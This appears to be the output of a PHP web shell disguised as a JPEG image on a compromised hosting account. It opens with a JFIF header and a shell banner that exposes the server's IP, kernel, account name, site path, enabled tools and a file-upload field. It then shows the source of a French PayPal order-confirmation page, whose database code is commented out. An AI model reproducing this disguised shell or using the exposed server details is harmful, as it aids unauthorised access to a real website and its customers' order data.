ÿØÿà JFIF ` ` ÿþxØ
| Server IP : 109.234.164.53 / Your IP : 216.73.216.110 Web Server : Apache System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : computer3 ( 1098) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/computer3/litsolide.com/ |
Upload File : |
<?php
/*
include_once('includes/config.php');
$idCde = $_GET['cde'];
$sql = $GLOBALS['bdd']->prepare('SELECT id, id_order, total FROM orders
WHERE id_order = :id_order');
$sql->execute(array('id_order' => $idCde));
$result = $sql->fetchAll();
$idd = $result[0]['id'];
$totCde = $result[0]['total'];
// ecrit la transaction
$statut = "1";
$qid = $bdd->prepare("INSERT INTO transactions (transaction_commande_id, transaction_total, transaction_statut) VALUES (:transaction_commande_id, :transaction_total, :transaction_statut)");
$qid->execute(array( 'transaction_commande_id' => $idd,
'transaction_total' => $totCde,
'transaction_statut' => $statut));
// ecrit le statut cde
$statut = "1";
$qid = $bdd->prepare("UPDATE order_status
SET status = :status, date_status = :date_status WHERE id_order = :id_order");
$qid->execute(array( 'status' => $statut,
'date_status' => date('Y-m-d H:i:s'),
'id_order' => $idd));
*/
?>
<html>
<head>
<title>Commande Paypal</title>
<meta http-equiv="Window-TARGET" content="_top">
</head>
<body style ="background-color : #151515;">
<center>
<br>
<table width="653" border="0" cellspacing="0" cellpadding="0" style="background-image: url('images/bandeau.jpg'); background-repeat: no-repeat; background-position: left top; background-color:#FFFFFF">
<tr>
<td align="center" class="txtcde" valign="top">
<br />
<br /><br />
<tr>
<td align="center" class="txtcde" valign="top">
<div id="logo"> </div>
<br>
<br>
<br>
Votre commande nous a bien été transmise et nous vous remercions pour votre confiance.
<br /><br /><br />
<?php echo$shop_company ; ?>
<br /><br />
<a href="./" class="bouton">Retour au site</a>
<br /><br />
<br />
</form>
<br>
</td>
</tr>
</table>
</body>
</html>